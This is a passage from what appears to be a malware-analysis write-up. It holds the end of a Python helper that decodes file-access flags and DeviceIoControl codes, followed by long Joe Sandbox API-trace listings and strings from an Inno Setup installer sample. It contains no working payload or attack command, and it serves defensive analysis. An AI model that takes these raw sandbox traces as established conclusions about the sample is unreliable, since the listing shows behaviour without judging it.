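        "share": _bits(share or 0, SHARE),
        "disposition": "?" if disp is None else DISPOSITION.get(disp, f"0x{disp:X}"),
        "flags": _bits(flags or 0, FLAGS),
    }


def device_io_summary(calls: List[ApiCall]) -> List[Dict[str, object]]:
    """Decode dwIoControlCode and buffer sizes of every DeviceIoControl in the listing."""
    out = []
    for c in calls:
        if c.name != "DeviceIoControl" or len(c.args) < 6:
            continue
        code = c.args[1]
        entry = {"ref": f"{c.ref:08X}", "code": "?" if code is None else f"0x{code:08X}",
                 "in_size": c.args[3], "out_size": c.args[5]}
        if code is not None:
            entry.update(decode_ioctl(code))
        out.append(entry)
    return out


if __name__ == "__main__":
    calls = parse_listing(SAMPLE_LISTING)
    print(decode_create_file(calls[0]))
    for entry in device_io_summary(calls):
        print(entry)
```

Run as a script it prints the decoded CreateFileA flags and one DeviceIoControl entry naming FSCTL_SET_COMPRESSION; feeding it the other "APIs" sections of the report is a matter of pasting their bullet lines into parse_listing. A code that decodes to a non-file-system device type, or to FILE_DEVICE_UNKNOWN with METHOD_NEITHER, is the case that deserves the driver-communication reading of this signature.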

                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 0047DB8E
                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 0047DBAC
                                                                          • ShowWindow.USER32(00000000,00000005,00000000,000000F0,00494F8C,0047D3DA,0047D40E,00000000,0047D42E,?,?,00000001,00494F8C), ref: 0047DBCE
                                                                          • ShowWindow.USER32(00000000,00000000,00000000,000000F0,00494F8C,0047D3DA,0047D40E,00000000,0047D42E,?,?,00000001,00494F8C), ref: 0047DBE2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$IconicLong
                                                                          • String ID:
                                                                          • API String ID: 2754861897-0
                                                                          • Opcode ID: 369b3e18d2165cb8bb48b2587b96ca03a768cff027144c2cea394ed926353b1c
                                                                          • Instruction ID: c4c813b94ba675872cbc2921d165099fe1b58c154ab1beafddf731999e56589c
                                                                          • Opcode Fuzzy Hash: 369b3e18d2165cb8bb48b2587b96ca03a768cff027144c2cea394ed926353b1c
                                                                          • Instruction Fuzzy Hash: 5A017170B142819BD700A7B5DC45F9627B85F01318F16847BB4469F3ABCB2DAC42D61C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0045ED24), ref: 0045ECA8
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0045ED04,?,00000000,?,00000000,0045ED24), ref: 0045ECE4
                                                                          • FindClose.KERNEL32(000000FF,0045ED0B,0045ED04,?,00000000,?,00000000,0045ED24), ref: 0045ECFE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 4c8216cd23e0ad7c597990ef92a379c131d9d30fe178f8c8937ccab258ab8b35
                                                                          • Instruction ID: 1c15e069fa90e75a86647c5f7c03675f72fe807dda2d2eae08813ce46935d9d4
                                                                          • Opcode Fuzzy Hash: 4c8216cd23e0ad7c597990ef92a379c131d9d30fe178f8c8937ccab258ab8b35
                                                                          • Instruction Fuzzy Hash: DA21C931504608AEDB15DB67DC41ADEB7BCEB49704F5084F7FC08D22A2D6389B48C959
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00424154
                                                                          • SetActiveWindow.USER32(?,?,?,004687FC), ref: 00424161
                                                                            • Part of subcall function 004235BC: ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
                                                                            • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021125AC,0042417A,?,?,?,004687FC), ref: 00423ABF
                                                                          • SetFocus.USER32(00000000,?,?,?,004687FC), ref: 0042418E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveFocusIconicShow
                                                                          • String ID:
                                                                          • API String ID: 649377781-0
                                                                          • Opcode ID: 826e83aebfae97061b379bc16a5d1b84d700d2e627d919f03dfb4d2f52cb7ad2
                                                                          • Instruction ID: 52aae3a4689a9740bd4d9c6d6ebd89914a33ab6eb49489b11b5c27e09e1b84ad
                                                                          • Opcode Fuzzy Hash: 826e83aebfae97061b379bc16a5d1b84d700d2e627d919f03dfb4d2f52cb7ad2
                                                                          • Instruction Fuzzy Hash: 6CF03A717001209BDB00AFAAD8C4B9633A8AF48304B55017BBD09EF34BCA7CDC5187A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00417C7F
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417C9D
                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417CD3
                                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417CFA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Placement$Iconic
                                                                          • String ID:
                                                                          • API String ID: 568898626-0
                                                                          • Opcode ID: 417382ec3429889133b32bde4c00db047fc4eacd7573cf41adb8130d41789b22
                                                                          • Instruction ID: f0313cfea0d4087130c3a657ee055cc65a4736f61d4b278e94d42609036002a6
                                                                          • Opcode Fuzzy Hash: 417382ec3429889133b32bde4c00db047fc4eacd7573cf41adb8130d41789b22
                                                                          • Instruction Fuzzy Hash: 31015A31204104ABDF10EE6A98C5EEA73A8AF44324F114166FD08CF342E638EC8086A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CaptureIconic
                                                                          • String ID:
                                                                          • API String ID: 2277910766-0
                                                                          • Opcode ID: c2a33cdbbae1cdfc2369431b38ce0fc9041f94e7b113fc5137cb4b1fd2442c1e
                                                                          • Instruction ID: 2956aca8664544b1eb357884f6cb47590399079b6183512574be6b3802fdb23b
                                                                          • Opcode Fuzzy Hash: c2a33cdbbae1cdfc2369431b38ce0fc9041f94e7b113fc5137cb4b1fd2442c1e
                                                                          • Instruction Fuzzy Hash: 02F0A471B04602A7DB20E72EC8C4AA762F69F84394B54403BF415C7B96EA7CDCC08318
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 0042410B
                                                                            • Part of subcall function 004239F4: EnumWindows.USER32(0042398C), ref: 00423A18
                                                                            • Part of subcall function 004239F4: GetWindow.USER32(?,00000003), ref: 00423A2D
                                                                            • Part of subcall function 004239F4: GetWindowLongA.USER32(?,000000EC), ref: 00423A3C
                                                                            • Part of subcall function 004239F4: SetWindowPos.USER32(00000000,004240CC,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,0042411B,?,?,00423CE3), ref: 00423A72
                                                                          • SetActiveWindow.USER32(?,?,?,00423CE3,00000000,004240CC), ref: 0042411F
                                                                            • Part of subcall function 004235BC: ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                          • String ID:
                                                                          • API String ID: 2671590913-0
                                                                          • Opcode ID: c74fb73a8881fd60f3fd614903c11219e2ccc8bc78df243e72f47ccd7f1af9d0
                                                                          • Instruction ID: b8e4b42960b6b3797255afb6d30997fccd36cf0c86298b6f3b138aeb4614201e
                                                                          • Opcode Fuzzy Hash: c74fb73a8881fd60f3fd614903c11219e2ccc8bc78df243e72f47ccd7f1af9d0
                                                                          • Instruction Fuzzy Hash: 76E0E5A0300100C7EB00AFAAD8C9B9672A9BB48304F5501BABC08CF24BD6B8C8948724
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,00412745), ref: 00412733
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: 5ac7982fb39f62f6f70c044b616f6008bafcba18ee83e8967f3a98960c284c43
                                                                          • Instruction ID: 8365c716c5e730cb372343108a6f593a498c89545a1faf81556fc105b3597b40
                                                                          • Opcode Fuzzy Hash: 5ac7982fb39f62f6f70c044b616f6008bafcba18ee83e8967f3a98960c284c43
                                                                          • Instruction Fuzzy Hash: 8B51D3356042059FC710DF5AD681A9BF3E5FF98304B3582ABE814C77A1D6B8AD92874C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00473B5E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: ce54198750e36d2c75895016167de93e0fa029d34df70342d56a8510856625dc
                                                                          • Instruction ID: 3e32aa5f128dc23a8b701fa4ecba52860cdafcd953849f4bd8a959afbbddc411
                                                                          • Opcode Fuzzy Hash: ce54198750e36d2c75895016167de93e0fa029d34df70342d56a8510856625dc
                                                                          • Instruction Fuzzy Hash: 1F415775B08104DFCB10CF99C6819AAB7F5EB48312B24C596E848DB746D338EF41EB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045B56B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CryptFour
                                                                          • String ID:
                                                                          • API String ID: 2153018856-0
                                                                          • Opcode ID: e51d4a8b77d663dbf5753caff9afe7d0a369bc5209e9a7b4c4ce857bc8fe2f36
                                                                          • Instruction ID: 9e8eafa16c368b04bfc03e3690b6b42464bb4fe35b2110d8adbf47a9256d09ee
                                                                          • Opcode Fuzzy Hash: e51d4a8b77d663dbf5753caff9afe7d0a369bc5209e9a7b4c4ce857bc8fe2f36
                                                                          • Instruction Fuzzy Hash: 07C09BF200520C7F65005795ECC9CB7B75CE6DC7657404126F6044210195716C508574
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,00469597), ref: 0045B57E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CryptFour
                                                                          • String ID:
                                                                          • API String ID: 2153018856-0
                                                                          • Opcode ID: c66c785d08d772f28e3adc9bfa18a8b196b3a7f7ba0323c99685d538528cd14f
                                                                          • Instruction ID: 5f2732264b6577c6f22f747bc4abd170fb833af863f4cd36b72278e664c57c22
                                                                          • Opcode Fuzzy Hash: c66c785d08d772f28e3adc9bfa18a8b196b3a7f7ba0323c99685d538528cd14f
                                                                          • Instruction Fuzzy Hash: E1A002B0A813057AFD6057609D0EF26262C97D4F05F2144697201E90D485A86441C52C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2868493918.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.2868472129.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.2868511858.0000000010002000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                          • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                          • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                          • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2868493918.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.2868472129.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.2868511858.0000000010002000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                          • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                          • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateMutexA.KERNEL32(00493A74,00000001,00000000,00000000,00456535,?,?,?,00000001,?,0045674F,00000000,00456765,?,00000000,00494628), ref: 0045624D
                                                                          • CreateFileMappingA.KERNEL32(000000FF,00493A74,00000004,00000000,00002018,00000000), ref: 00456285
                                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045650B,?,00493A74,00000001,00000000,00000000,00456535,?,?,?), ref: 004562AC
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004563B9
                                                                          • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045650B,?,00493A74,00000001,00000000,00000000,00456535), ref: 00456311
                                                                            • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004563D0
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00456409
                                                                          • GetLastError.KERNEL32(00000000,000000FF,?,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045641B
                                                                          • UnmapViewOfFile.KERNEL32(00000000,00456512,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004564ED
                                                                          • CloseHandle.KERNEL32(00000000,00456512,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004564FC
                                                                          • CloseHandle.KERNEL32(00000000,00456512,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00456505
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                          • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OgE$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp$egE
                                                                          • API String ID: 4012871263-2037318299
                                                                          • Opcode ID: 2bd007795e1b2ddc76d7ce9a559c48c324d1643155135a6e5ac56ae879ba47b5
                                                                          • Instruction ID: a20c5760107f962147a9319040fdeb0bea2bc75d6d5764986410e607720027f7
                                                                          • Opcode Fuzzy Hash: 2bd007795e1b2ddc76d7ce9a559c48c324d1643155135a6e5ac56ae879ba47b5
                                                                          • Instruction Fuzzy Hash: E9916270E002199BDB10EFA9C845B9EB7B4FB08305F91856AF814EB393D7789948CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetVersion.KERNEL32(?,00418F60,00000000,?,?,?,00000001), ref: 0041F096
                                                                          • SetErrorMode.KERNEL32(00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0B2
                                                                          • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0BE
                                                                          • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0CC
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F0FC
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F125
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F13A
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F14F
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F164
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F179
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F18E
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F1A3
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F1B8
                                                                          • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F1CD
                                                                          • FreeLibrary.KERNEL32(00000001,?,00418F60,00000000,?,?,?,00000001), ref: 0041F1DF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                          • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                          • API String ID: 2323315520-3614243559
                                                                          • Opcode ID: 3dbd376a422217cd60190c6702d938cf0380dd97f6cabc27e0354af46de27ebb
                                                                          • Instruction ID: 815e8fcf402ef61c9757a0b1c257229fab3912ba39737af4d7c4dcf1902ae053
                                                                          • Opcode Fuzzy Hash: 3dbd376a422217cd60190c6702d938cf0380dd97f6cabc27e0354af46de27ebb
                                                                          • Instruction Fuzzy Hash: 75311EB1600740EBDF10EFB5EC8AA653294B76E729745093BB108DB1A2D77C498ACB1C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • Install was done in 64-bit mode but not running 64-bit Windows now, xrefs: 00491215
                                                                          • utCompiledCode[1] is invalid, xrefs: 004911DB
                                                                          • Uninstall, xrefs: 00490FD7
                                                                          • Uninstall DAT: , xrefs: 00491051
                                                                          • DeinitializeUninstall, xrefs: 004916A4
                                                                          • Original Uninstall EXE: , xrefs: 0049102E
                                                                          • InitializeUninstall, xrefs: 0049135A
                                                                          • Will restart because UninstallNeedRestart returned True., xrefs: 004914EA
                                                                          • InitializeUninstall returned False; aborting., xrefs: 00491392
                                                                          • Uninstall command line: , xrefs: 00491074
                                                                          • Not calling UninstallNeedRestart because a restart has already been deemed necessary., xrefs: 00491519
                                                                          • Setup version: Inno Setup version 5.3.4 (a), xrefs: 00491024
                                                                          • Removed all? %s, xrefs: 00491464
                                                                          • Cannot find utCompiledCode record for this version of the uninstaller, xrefs: 004911A0
                                                                          • UninstallNeedRestart, xrefs: 0049149A, 004914D3
                                                                          • Need to restart Windows? %s, xrefs: 0049153B
                                                                          • Will not restart Windows automatically., xrefs: 0049160E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$Show
                                                                          • String ID: Cannot find utCompiledCode record for this version of the uninstaller$DeinitializeUninstall$InitializeUninstall$InitializeUninstall returned False; aborting.$Install was done in 64-bit mode but not running 64-bit Windows now$Need to restart Windows? %s$Not calling UninstallNeedRestart because a restart has already been deemed necessary.$Original Uninstall EXE: $Removed all? %s$Setup version: Inno Setup version 5.3.4 (a)$Uninstall$Uninstall DAT: $Uninstall command line: $UninstallNeedRestart$Will not restart Windows automatically.$Will restart because UninstallNeedRestart returned True.$utCompiledCode[1] is invalid
                                                                          • API String ID: 3609083571-540932686
                                                                          • Opcode ID: 95845ce58dd33b11270f0bcad1ef958447a36d73fe786c218c0066e2c8b8b3eb
                                                                          • Instruction ID: 59b7c036a03d461677562de2f337d543927cbba062a10b008de86d2ad0bb5db2
                                                                          • Opcode Fuzzy Hash: 95845ce58dd33b11270f0bcad1ef958447a36d73fe786c218c0066e2c8b8b3eb
                                                                          • Instruction Fuzzy Hash: CB12A170A00645AFDB12EB66E852B5E7FB1AB55308F20847BF8009B3A2C67C9D45CB5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,0041A8B4,?), ref: 0041C9B0
                                                                          • 73A24C40.GDI32(?,00000000,?,0041A8B4,?), ref: 0041C9BC
                                                                          • 73A26180.GDI32(0041A8B4,?,00000001,00000001,00000000,00000000,0041CBD2,?,?,00000000,?,0041A8B4,?), ref: 0041C9E0
                                                                          • 73A24C00.GDI32(?,0041A8B4,?,00000000,0041CBD2,?,?,00000000,?,0041A8B4,?), ref: 0041C9F0
                                                                          • SelectObject.GDI32(0041CDAC,00000000), ref: 0041CA0B
                                                                          • FillRect.USER32(0041CDAC,?,?), ref: 0041CA46
                                                                          • SetTextColor.GDI32(0041CDAC,00000000), ref: 0041CA5B
                                                                          • SetBkColor.GDI32(0041CDAC,00000000), ref: 0041CA72
                                                                          • PatBlt.GDI32(0041CDAC,00000000,00000000,0041A8B4,?,00FF0062), ref: 0041CA88
